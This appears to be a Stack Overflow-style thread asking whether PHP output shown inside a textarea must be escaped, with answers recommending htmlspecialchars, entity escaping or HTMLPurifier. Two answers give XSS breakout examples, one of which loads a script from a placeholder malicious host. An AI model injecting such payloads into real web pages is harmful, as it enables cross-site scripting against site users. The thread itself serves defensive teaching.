# Need to escape or sanatise output that is displayed in a <textarea>?

Tags: php, html, textarea

Do you have to escape or sanatise output that will be in a `<textarea>`?

It seems that if i sanatise it using `htmlentities()` the actual &...; character replacements come up

Comment: Where does the output comes from?

Comment: SANITIZE EVERYTHING. TRUST NOTHING.

Answer (score 0, accepted):

Yes, you need to sanitize. Use `htmlspecialchars($str, ENT_QUOTES)` instead.

Answer (score 1):

Well, you have to:

```
<?php
$content = "</textarea><script>alert('hi!')</script>";
?>

<textarea>
<?php echo $content; ?>
</textarea>
```

[image]

Answer (score 0):

If that output was initially provided by the user or any untrusted source (i.e. not directly from your code) then it needs to be sanitized to prevent against XSS attacks.

Answer (score 0):

You need to consider whatever the output is editable by the user or not. If it not and it is a trusted output (maybe coming from pre defined texts that YOU wrote) you obviously don't. Otherwise yes. And the HTML chars replacement is quite normal but you don't have to worry because when the page is read and outputted to the user browser all the previous characters will still be there.

Notice that the `>` and `<` characters could be used, if not sanitize, to inject other HTML code and particular the `<script>` tag that can run Javascript.

Answer (score 0):

Always escape all occurances of `<` and `>` (with `&lt;` and `&gt;`) within the `textarea`'s content. Otherwise one could provide the following content (example) to "escape" the textarea and inject HTML code:

```
</textarea><script src="http://malicious.code.is/us.js"></script>
```

Otherwise this could result in the following code:

```
<textarea id="text"></textarea><script src="http://malicious.code.is/us.js"></script></textarea>
```

The second `</textarea>` at the end would be ignored and the script tag before would be executed.

Answer (score 0):

Just using `htmlspecialchars()` is NOT enough.  It still leaves you vulnerable to certain multibyte character attack vectors (even when using `htmlspecialchars($string, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')`

Perhaps look at a library like [HTMLPurifier](http://htmlpurifier.org/) to give you a more complete solution.

Here is a pretty good summary of XSS protection in PHP.

http://www.bytetouch.com/blog/programming/protecting-php-scripts-from-cross-site-scripting-xss-attacks/

Comment: I am under the impression that if you specify any given charset in the page and in `htmlspecialchars` (and you use `mb_convert_encoding` or `iconv` to make sure you only accept that charset), then it should be safe, no?

Comment: If you use `mb_convert_encoding()` prior to making the `htmlspecialchars()` call, I think you should be OK.